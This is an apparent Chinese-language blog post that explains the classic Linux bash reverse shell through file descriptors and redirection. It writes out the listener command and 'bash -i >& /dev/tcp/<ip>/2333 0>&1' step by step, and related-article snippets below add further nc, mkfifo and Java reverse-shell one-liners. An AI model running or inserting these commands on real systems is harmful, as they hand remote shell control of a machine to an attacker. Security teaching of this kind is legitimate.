Linux 反弹shell----理解反弹shell的本质

最新推荐文章于 2023-05-29 10:17:22 发布
最新推荐文章于 2023-05-29 10:17:22 发布
阅读量247 收藏
点赞数
分类专栏: 安全 文章标签: linux shell
原文链接:https://xz.aliyun.com/t/2548
版权

文章内容和图片参考于:https://xz.aliyun.com/t/2548

 

当Linux启动的时候会默认打开三个文件描述符,分别是:

标准输入standard input 0 (默认设备键盘)
标准输出standard output 1(默认设备显示器)
错误输出:error output 2(默认设备显示器)

文件所有输入输出都是由该进程所有打开的文件描述符控制的。(Linux一切皆文件,就连键盘显示器设备都是文件,因此他们的输入输出也是由文件描述符控制)

我们就以最常见的反弹bash为例:
attacker机器上执行:

nc -lvp 2333

victim 机器上执行:

bash -i >& /dev/tcp/192.168.146.129/2333 0>&1

解析这个命令,首先这个命令分为三步

为了实现交互,我们需要把受害者交互式shell的输出重定向到攻击机上
在受害者机器上输入

bash -i > /dev/tcp/192.168.146.129/2333

示意图:

但是这里有一个问题,攻击者没有能够实现对受害者的控制,攻击者执行的命令没法在受害者电脑上执行。

于是我们似乎还需要一条这样的指令

bash -i < /dev/tcp/192.168.146.129/2333

示意图:

这条指令的意思是将攻击者输入的命令输入给受害者的bash,自然就能执行了

最后就是将错误信息也输入到/dev/tcp/192.168.146.129/2333

所以这里会用到   >&、&>这两个用法

bash -i >& /dev/tcp/192.168.146.129/2333

这时错误信息也传到攻击者ip当中

 

注意 >& 和 0>&1的区别:

>&和&>都是代表错误输重定向

而当>&周围紧挨着1\0\2数字时他的含义就变了.  这时&的作用只是防止1\0\2被shell认为是文件, 能正确的识别为 1=标准输出, 2=错误输出 ,0=标准输入

最后就是将以上三步结合

bash -i > /dev/tcp/192.168.146.129/2333 0>&1 2>&1

当然我们也可以执行与之完全等价的指令

bash -i >& /dev/tcp/192.168.146.129/2333 0>&1

至此,我们的反弹shell的经典语句就分析完了,通过这条语句的分析我们能大致的了解反弹shell的本质,以后碰到其他的反弹shell 的语句也能用类似的分析方法区分析,甚至我们也可以自己举一反三创造更加绝妙的反弹shell 的语句

 

 

最后理解:文件描述符的复制

格式: [n]<&[m] / [n]>&[m] (这里所有字符之间不要有空格)

说明:

1)这里两个都是将文件描述符 n 复制到 m ,两者的区别是,前者是以只读的形式打开,后者是以写的形式打开

因此 0<&1 和 0>&1 是完全等价的(读/写方式打开对其没有任何影响)

醉意流年IE
关注
专栏目录
NC反弹Shell
qq_23066945的博客
11-23 653
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
linux反弹shell的原理浅析
黑锤的博客
08-14 779
反弹shell文件描述符与重定向 在这里最难理解的就是文件描述符和重定向这两部分 先来讲一下linux的文件描述符,什么是文件描述符, 在linux系统中将所有设备都当做文件来处理,而linux文件描述符用来标识每个文件对象,在我理解中就是描述符用来指定对象的,这样才能井然有序的运行。在linux系统中就连输入设备和输出设备都被当成是文件来处理就拿显示器和键盘输入都拿来当成文件处理,他们都有...
反弹shell本质及实战
静水流深,沧笙踏歌
05-13 406
Linux反弹shell(一)文件描述符与重定向 Linux 反弹shell(二)反弹shell本质 Linux反弹shell几种方法学习总结
什么是反弹 Shell
weixin_36888745的博客
07-07 570
简单来说,Shell 就是实现用户命令的接口,通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制。
什么是反弹shell
最新发布
qq_44833342的博客
05-29 636
然后通过该shell程序与目标系统建立远程连接,从而控制目标系统。这种攻击方式通常用于攻击Web服务器或其他远程系统,攻击者可以通过反弹shell获取目标系统的敏感信息、执行恶意代码等操作。为了防止反弹shell攻击,管理员需要定期更新系统补丁、禁用不必要的服务和端口、监控网络流量等措施。反弹shell是指攻击者利用漏洞或其他方式,成功在目标系统上安装了一个恶意的shell程序。
Linux反弹Shell总结
qq_45600801的博客
01-06 4297
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3163
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
Linux反弹shell
weixin_64338385的博客
11-26 2312
0x01. bash 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口 在目标主机上执行: bash -i >& /dev/tcp/攻击主机i...
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
内网渗透之Linux反弹shell(综合)
墨鱼菜鸡
09-10 1379
目录 知识点 Linux mkfifo命令基本用法 1.首先了解linux命令执行顺序 2.然后了解下管道命令(pipe) 3.常见管道命令 4.mkfifo则可以创建命名管道 Linux标准文件描述符 更改标准输出的位置 更改标准输入的位置 /dev/null 重定向 输入重定向 输出重定向 管道 环境 01NC正向Sh...
linux利用java反弹shell_Java Runtime.exe() 执行命令与反弹shell(上)
weixin_34710938的博客
02-26 575
0x00 前言在自己学习复现 Nexus Repository Manager 3 RCE 漏洞的时候(CVE-2020-10199/10204)由于自己对 Java 的 Runtime.exec() 执行命令以及反弹shell理解的太过于浅薄,使用了以下语句无法反弹shell,踩了很多坑$\\A{''.getClass().forName('java.lang.Runtime').getMeth...
反弹shell
m0_51632271的博客
01-25 1002
反弹shell 学习笔记 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发器请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 持久化控制,通过每隔一段时间执行反弹shell即可获取持久化控制。 端口使用不固定。(尽量找一些不常用的端口。) nc -lnvp 12345 #服务端开启监听12345端口 bash -i >& /d
关于反弹shell理解
weixin_42151709的博客
03-22 935
想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹。 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢? 1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。它的ip会动态改变,你不能持续控...
反弹shell原理
Monica的博客
11-01 2344
原理 反弹shell(reverse shell),就是攻击端(本机)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 实验案例 实验环境: 攻击端:mac ip地址:192.168.57.252 受害端:kali linux ip地址:10.211.5519 nc反弹: 攻击端mac终端输入: nc ...
深度解析:Linux反弹shell的分类与本质
作者决定将反弹shell进行更细致的划分,以便更好地理解和掌握它们的本质和转换方式。 1. 本质 反弹shell的核心包括两个要素:网络连接和命令执行。网络连接是指被控端主动与受控端建立连接,而命令执行则意味着受控...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值